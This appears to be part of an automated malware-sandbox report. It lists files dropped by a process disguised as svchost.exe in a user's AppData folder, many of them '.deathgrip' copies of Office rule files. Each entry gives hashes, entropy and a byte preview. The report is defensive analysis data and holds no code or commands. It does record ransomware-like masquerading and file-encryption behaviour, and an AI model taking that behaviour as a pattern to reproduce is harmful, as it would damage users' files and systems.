                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700650v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700651v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700651v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.811026542938948
                                                          Encrypted:false
                                                          SSDEEP:48:90K6HQCBxH82BjW05d44uaFPXRSdYLrwqaD:367xH8i1/PXRFO
                                                          MD5:8B34CBF9BBE9A3926A44D1EC18FA6C82
                                                          SHA1:E676F29132F48A629697DA2453268355AABD584D
                                                          SHA-256:1AF832463649194C39C706BF82109B72798021E9C98B5E125707DEED54B28D7F
                                                          SHA-512:4F1366735F0AC65B5734049B231AD0284BE7330C589B91411A185A775BB784FAEB404EE4357F22C243F90D17379699C4118DD806E43A1FD875D6EB529BEB9926
                                                          Malicious:false
                                                          Preview:...........h..td..ebE4...9..w..i....2...(N..6+.;.(.8............k.f`O.K..7....qR..\....q..g.&.....jt...|^v..f...y.].^a/..D....d.=.........8..7..?u1.6.".4.E.zoX.E-B.:..o.....=......o.f....}1d`o.....gN.....I..$.f.E...<I.as:@.>.Vv..4._ib.U.t*.0P...=KV:.Vg...H...P~.........|.T.}.*.4|$.....(B|.R......T.....kD..i../ .......U.M.a.@:..........il....B...IP...N..$"X.2pb.....*\Z.Rq..^.......E......#..*^.[_.....U..OPiDF(,..&.K..k..zjb.....2./0....9.......p..H.>....>',..0..Z....bf7....P...D.......=Kq....+..8]..5..+....7...,6.._....;-..Y.{.3..@../..9.5(.d......Q........B...`.....v..`...SQ..w^..M...6W *1.\tc.W..GN..+9..|H4....PY..[.......c..T.+.tEBzl..'.=...CL.r.9.`8C^.C..1..YO7[7~.B0.U....;....9..Y.f.&'.K.fg..M.0......"nX9../....M..|...`p.....0%.t]6...x..N.s.....@)..l.N..d..?&W.....o...}T{.r....%..{k..;2..+.i..SI2>..l..=..0.W...c...".+..p.8S...A.c(>.\i.e..|.J.......jZ... .w.?.+{./i2Q.fD.Q-D..nF.2..n......Q.Z.b..QF2..._.........n:Q..A(b.H.;s7yJ..9#;

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700700v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700700v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700701v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700701v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700750v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700750v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700751v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700751v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700850v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700850v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700851v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700851v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700900v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700900v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700901v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700901v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.827752906363399
                                                          Encrypted:false
                                                          SSDEEP:24:UL5C7yWqG0nNYWp489WIhUwMyIMImLcSmr8T+zgQvLEbd2qlvBYSqO9zHw+IWOY4:IC7cNjU71yJImgrrbgCEMqlvJBwmOY4
                                                          MD5:6B186D21E7F9249BBB757C7B5364BF0E
                                                          SHA1:ED9212F49E67BAAC1CC22D85B3CB139A25416432
                                                          SHA-256:68B90A9F2BCBE80B1436581E0CF5DD0E35A19ACB8C6B27CA962345D3E978CAD9
                                                          SHA-512:8F4273831E3C86CEEE8BCC9AA6FE4A61C79C973BE1E3AA8781CC1F419A8459A09D2BD654512EA668D17B57370D808ACBE87E6E5EEE042683E78C3E3014A12B79
                                                          Malicious:false
                                                          Preview:........"..D..}.@C`F'.%.a..}.Q....T.1+k.+...N..&.~N..e}......8.1..(5...q......m1`...uWV..)..U"d.%.T."J.d..~:..84..N"..yV..).gY.c0...;.i4....G.*..w@o.#..~.....p..f8'.J..v..Lh..1.K....R.n..7...s.x.3.'w..K`.bjQ.(~'/}..L.E.^..&<..g.[.d.(..4B...A..4.../.;w...b."~..me.....}....b.K....%..[.Z].:.B...y.I;...j.C#M.....=M.3..4.EE/....]...*t....N{.hc.......S....w..x................c.+.....<.1../. T...c...]A....g..#...*b6q.OV.5Pi..{Ak...a....._...h..?...c../........:.A8.o...*.I \.d.....x...8.hvGN.0\.4.$..#../E1.f-p...=.-...q.O......;.1$....kQ..O.*.f.$.L...0...v..N.|t....&.v.l.g..O.s....{.E..4-.2....1.....L............0..t..J...E.Ef.u....C..|5U.pV....T......V.......8yo+!c....JI!,.<R:..O-.$.H{~.ow....,h.,TT.%...O...'m.........:.O..%.5:.T88...{.R.......=......O|n.X....8z.mm.p..ox`.....`|)`....?.Q.....9..=cV......V.s....O^W...B......=f......I..{.s.^.{OL.2).<o.....y....oP.......[L..+.h.H.4...>[)r.fS.....\h....?..@....N..A.....v.w.,.s.l.D.....b.[....4....E.v...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700950v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700950v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700951v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700951v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701050v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701050v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701051v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701051v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701101v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701101v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.824163156917345
                                                          Encrypted:false
                                                          SSDEEP:24:t/v5/GFSi9kcPityVBAlPZLZ+VFnFM/XB20fK5bWofqZGfo98DqXmcmfjkmkvk:t/BgSUwKVXM/Rbmq79OqFaYmk8
                                                          MD5:0F7FEABFE8D03662EDA3953BB9F7D9F0
                                                          SHA1:A4CFE6CE85D22D91D1D5466C8D4B8D2D5357BB05
                                                          SHA-256:0A68712C8A911CC48321262B902B9358A0596FAF7C4E75F4FA046DF18B1CB66C
                                                          SHA-512:1CB619DA8DD32E7DFB3506668A83971E1CD010EB7B5DACB644906E868F96734BE20FA0C0AAB8CFC5DBB87650E07ACD39F208417F3DCA44EA8B0721E0B853BCFD
                                                          Malicious:false
